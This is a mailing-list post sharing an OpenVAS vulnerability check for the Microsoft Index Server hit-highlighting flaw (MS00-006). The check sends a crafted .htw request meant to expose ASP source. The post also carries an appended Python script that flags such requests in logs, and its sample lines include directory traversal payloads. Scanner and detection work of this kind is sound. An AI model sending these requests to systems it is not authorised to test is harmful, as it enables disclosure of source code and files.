Hi all, here is the NVT for MS00-06. Shortly I'll send the Filemaker, MDNS and
EMC Legato information gathering modules. Note that the script_id is missing.

# OpenVAS Vulnerability Test
# $Id$
# Description:
# This program tests for the following vulnerabilities:
# Microsoft Index Server File Information and Path Disclosure Vulnerability (MS00-006)
# Microsoft Index Server 'Malformed Hit-Highlighting' Directory Traversal Vulnerability (MS00-006)
# Microsoft IIS 'idq.dll' Directory Traversal Vulnerability (MS00-006)
# Microsoft Index Server ASP Source Code Disclosure Vulnerability (MS00-006)
#
# Author:
# Christian Eric Edjenguele <[EMAIL PROTECTED]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 and later,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

 
if(description)
{
 # Placeholder: the real script_id still has to be assigned
 script_id(00000);
 script_bugtraq_id(950);
 script_xref(name: "Microsoft", value: "MS00-006");
 script_cve_id("CVE-2000-0097");
 name["english"] = "Malformed Hit-Highlighting Argument Vulnerability";
 script_name(english:name["english"]);

 # A double-quoted NASL string cannot contain double quotes, so the
 # vulnerability name is quoted with single quotes inside the text
 desc["english"] = "
The WebHits ISAPI filter in Microsoft Index Server allows remote attackers to
read arbitrary files, aka the 'Malformed Hit-Highlighting Argument' vulnerability.

Solution :
To fix that, you must download the latest updates from the Microsoft security
website:
http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp

Risk factor : Medium";
 script_description(english:desc["english"]);

 summary["english"] = "A vulnerability on Microsoft index server allows unauthorized predictable file location";
 script_summary(english:summary["english"]);

 script_category(ACT_GATHER_INFO);

 script_copyright(english:"This script is under GPL v2 +");
 family["english"] = "General";
 script_family(english:family["english"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 80);

 exit(0);
}
#
# The script code starts here
#
include("http_func.inc");

port = get_http_port(default:80);

# ASP files the plugin will test
pages = make_list('default.asp', 'iisstart.asp', 'localstart.asp');

foreach asp_file (pages)
{
 # Open a fresh HTTP connection for every request: the socket is closed
 # after each reply, so it cannot be shared across iterations
 soc = http_open_socket(port);
 if (!soc) exit(0);

 # Build the hit-highlighting request for this file
 req = http_get(item:string("/null.htw?CiWebHitsFile=/", asp_file,
                            "%20&CiRestriction=none&CiHiliteType=Full"),
                port:port);
 send(socket:soc, data:req);

 # Get back the response: status line, then headers, then body
 reply_headers = "";
 reply_bodylowerized = "";
 reply_code = recv_line(socket:soc, length:1204);
 if (reply_code)
 {
  reply_header = http_recv_headers2(socket:soc);
  reply_headers = strcat(reply_code, reply_header);
  reply_body = http_recv_body(socket:soc, headers:reply_headers, length:0);
  reply_bodylowerized = tolower(reply_body);
 }

 # Close the HTTP connection
 http_close_socket(soc);

 # Check the reply for the vulnerability. reply_code holds the whole
 # status line (e.g. "HTTP/1.1 200 OK"), so look for the code inside it
 if ('Microsoft-IIS' >< reply_headers && ' 200 ' >< reply_code &&
     '<html>' >< reply_bodylowerized)
 {
  security_hole(port);
  exit(0); # one report per port is enough
 }
}
 ===
Christian Eric Edjenguele
IT Security Software Developer & Researcher
tel. +39 3408580513
View my linkedin profile: http://www.linkedin.com/in/edjenguele
My blog: http://www.edjenguele.blogspot.com
---
Management, Developers, Security Professionals – can only result in one thing…… 
better security.
http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference Sept 22nd-25th 
2008 
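
A log-side counterpart to the plugin above, added here as an example and not part of the posted NVT or of OpenVAS: it flags recorded request URIs that match what the plugin sends (an `.htw` path whose `CiWebHitsFile` value ends in an encoded space) and, going beyond the posted request, also flags `..` path segments. The four-field log layout, the function names and the sample lines are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qsl

def classify_htw_request(uri):
    """Return the reasons a request URI looks like an MS00-006 probe ([] if none)."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith(".htw"):
        return []
    # Parameter names are matched case-insensitively; values arrive URL-decoded.
    params = {k.lower(): v for k, v in parse_qsl(parts.query, keep_blank_values=True)}
    target = params.get("ciwebhitsfile")
    if target is None:
        return []
    reasons = []
    if target != target.rstrip():
        # "%20" (or "+") appended to the file name, as in the plugin's request
        reasons.append("trailing whitespace after file name")
    if ".." in target.replace("\\", "/").split("/"):
        reasons.append("directory traversal segment")
    return reasons

def scan(log_text):
    """Yield (source, status, uri, reasons) for every flagged line of a simple
    'source method uri status' log (constructed layout, an assumption)."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue
        source, _method, uri, status = fields
        reasons = classify_htw_request(uri)
        if reasons:
            findings.append((source, int(status), uri, reasons))
    return findings

# Constructed sample lines (documentation address ranges, not real traffic)
SAMPLE_LOG = """\
192.0.2.10 GET /null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full 200
192.0.2.10 GET /NULL.HTW?ciwebhitsfile=/iisstart.asp+&CiRestriction=none&CiHiliteType=Full 404
198.51.100.7 GET /docs/q.htw?CiWebHitsFile=/docs/../../example.txt&CiRestriction=none 200
198.51.100.8 GET /docs/q.htw?CiWebHitsFile=/docs/manual.htm&CiRestriction=backup 200
198.51.100.9 GET /default.asp 200
"""

if __name__ == "__main__":
    for source, status, uri, reasons in scan(SAMPLE_LOG):
        print(source, status, "; ".join(reasons), uri)
```

A flagged request that was answered with status 200 deserves the first look, since that is the same condition the plugin treats as a hit.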
